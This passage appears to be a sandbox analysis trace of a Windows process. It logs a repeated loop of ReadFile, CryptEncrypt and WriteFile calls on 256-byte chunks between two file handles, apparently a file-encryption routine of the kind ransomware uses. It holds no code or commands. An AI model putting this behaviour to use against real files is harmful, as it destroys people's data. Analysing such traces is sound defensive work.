nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.498] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.498] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.498] GetLastError () returned 0x0 [0204.498] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.498] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.499] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.499] GetLastError () returned 0x0 [0204.499] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.499] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.499] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.499] GetLastError () returned 0x0 [0204.499] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.499] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.499] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.499] GetLastError () returned 0x0 [0204.499] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.499] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.499] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.499] GetLastError () returned 0x0 [0204.499] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.499] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.499] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.499] GetLastError () returned 0x0 [0204.499] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.500] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.500] GetLastError () returned 0x0 [0204.500] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.500] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.500] GetLastError () returned 0x0 [0204.500] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.500] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.500] GetLastError () returned 0x0 [0204.500] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.500] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.500] GetLastError () returned 0x0 [0204.500] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.500] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.500] GetLastError () returned 0x0 [0204.500] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.501] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.501] GetLastError () returned 0x0 [0204.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.501] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.501] GetLastError () returned 0x0 [0204.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.501] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.501] GetLastError () returned 0x0 [0204.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.501] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.501] GetLastError () returned 0x0 [0204.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.502] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.502] GetLastError () returned 0x0 [0204.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.502] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.502] GetLastError () returned 0x0 [0204.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.502] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.502] GetLastError () returned 0x0 [0204.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.502] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.502] GetLastError () returned 0x0 [0204.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.502] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.502] GetLastError () returned 0x0 [0204.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.503] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.503] GetLastError () returned 0x0 [0204.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.503] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.503] GetLastError () returned 0x0 [0204.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.503] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.503] GetLastError () returned 0x0 [0204.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.503] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.503] GetLastError () returned 0x0 [0204.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.503] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.503] GetLastError () returned 0x0 [0204.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.503] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.503] GetLastError () returned 0x0 [0204.503] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.504] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.504] GetLastError () returned 0x0 [0204.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.504] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.504] GetLastError () returned 0x0 [0204.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.504] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.504] GetLastError () returned 0x0 [0204.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.504] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.504] GetLastError () returned 0x0 [0204.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.504] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.504] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.504] GetLastError () returned 0x0 [0204.504] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.505] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.505] GetLastError () returned 0x0 [0204.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.505] ReadFile (in: hFile=0x15b0, 